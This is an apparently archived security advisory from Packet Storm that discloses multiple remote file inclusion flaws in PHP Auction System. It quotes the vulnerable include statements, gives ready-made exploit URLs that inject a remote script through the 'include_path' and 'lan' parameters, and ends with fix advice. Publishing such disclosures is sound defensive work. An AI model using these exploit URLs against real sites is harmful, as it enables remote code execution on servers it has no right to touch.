exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHP Auction System Remote File Inclusion

PHP Auction System Remote File Inclusion
Posted Jan 7, 2009
Authored by darkmasking | Site idsafeshield.com

PHP Auction System suffers from multiple remote file inclusion vulnerabilities.

tags | exploit, remote, php, vulnerability, code execution, file inclusion
SHA-256 | 900bab694340c26b08b9b9d8864ce664ee1d3eb5781ad058e91ba29e653d32ac

PHP Auction System Remote File Inclusion

Change Mirror Download
[»]=======================================================================================================[_][-][X]
[»] [»]
[»] PHPAuctionSystem Multiple Remote File Inclusion Vulnerability [»]
[»] [»]
[»] ======= ------d-------m------ ==== ==== [»]
[»] || = | |(o o)| | || || || [»]
[»] || = ||(~)|| || || [»]
[»] ======= /|\ || || [»]
[»]=============================================================================================================[»]
[»] Author : ~darkmasking~ [»]
[»] Date : January, 6th 2009 [»]
[»] Web : https://www.idsafeshield.com [»]
[»] Contact : support[at]idsafeshield[dot]com [»]
[»] Critical Level : Dangerous [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] Affected software description : [»]
[»] Software : PHP Auction System [»]
[»] Vendor : http://www.phpauctions.info/ [»]
[»] Price : $59.99 [»]
[»]=============================================================================================================[»]
[»] [»]
[»] [~] Vulnerable file [»]
[»] [»]
[»] [+] all file below is affected by "include_path" parameter [»]
[»] [»]
[»] ./includes/settings.inc.php [»]
[»] $password_file = $include_path."passwd.inc.php"; [»]
[»] include($password_file); [»]
[»] include $include_path."fonts.inc.php"; [»]
[»] include $include_path."fontsize.inc.php"; [»]
[»] include($include_path."currency.inc.php"); [»]
[»] include($include_path."errors.inc.php"); [»]
[»] include($include_path."https.inc.php"); [»]
[»] [»]
[»] ./includes/auction_confirmation.inc.php [»]
[»] require("./includes/messages.inc.php"); [»]
[»] [»]
[»] ./includes/converter.inc.php [»]
[»] include($include_path."nusoap.php"); [»]
[»] [»]
[»] ./includes/messages.inc.php [»]
[»] require($include_path.'messages.'.$language.'.inc.php'); [»]
[»] [»]
[»] ./includes/stats.inc.php [»]
[»] include $prefix."includes/useragent.inc.php"; [»]
[»] include $prefix."includes/domains.inc.php"; [»]
[»] [»]
[»] ./includes/useragent.inc.php [»]
[»] include $prefix."includes/browsers.inc.php"; [»]
[»] include $prefix."includes/platforms.inc.php"; [»]
[»] [»]
[»] ./includes/user_confirmation.inc.php [»]
[»] require("./includes/messages.inc.php"); [»]
[»] [»]
[»] [»]
[»] [+] All file below is affected by "lan" parameter [»]
[»] [»]
[»] ./browse.php [»]
[»] ./search.php [»]
[»] if(!empty($_GET['lan'])) { [»]
[»] $language = $lan; [»]
[»] $_SESSION['language'] = $language; [»]
[»] [»]
[»] #// Set language cookie [»]
[»] setcookie("USERLANGUAGE",$lan,time()+31536000,"/"); [»]
[»] } elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) { [»]
[»] $language = $SETTINGS['defaultlanguage']; [»]
[»] $_SESSION['language'] = $language; [»]
[»] [»]
[»] #// Set language cookie [»]
[»] setcookie("USERLANGUAGE",$language,time()+31536000); [»]
[»] } elseif(isset($_COOKIE['USERLANGUAGE'])) { [»]
[»] $language = $_COOKIE['USERLANGUAGE']; [»]
[»] } [»]
[»] [»]
[»] require($include_path.'messages.'.$language.'.inc.php'); [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Exploit [»]
[»] [»]
[»] [+] "include_path" parameter [»]
[»] [»]
[»] http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/stats.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/useragent.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode] [»]
[»] [»]
[»] [»]
[»] [+] "lan" parameter [»]
[»] [»]
[»] http://www.darkvictims.com/[path]/browse.php?lan=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/search.php?lan=[darkcode] [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] How to fix this vulnerability [»]
[»] [»]
[»] Edit the source code to ensure that input is properly validated. Where is possible, [»]
[»] it is recommended to make a list of accepted filenames and restrict the input to that list. [»]
[»] [»]
[»] For PHP, the option allow_url_fopen would normally allow a programmer to open, [»]
[»] include or otherwise use a remote file using a URL rather than a local file path. [»]
[»] It is recommended to disable this option from php.ini. [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Greetz [»]
[»] [»]
[»] BUAT DIRI SENDIRI AJA [ Sorry Bro belum dapat teman :) ] [»]
[»] [»]
[»] [»]
[»]=============================================================================================================[»]
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close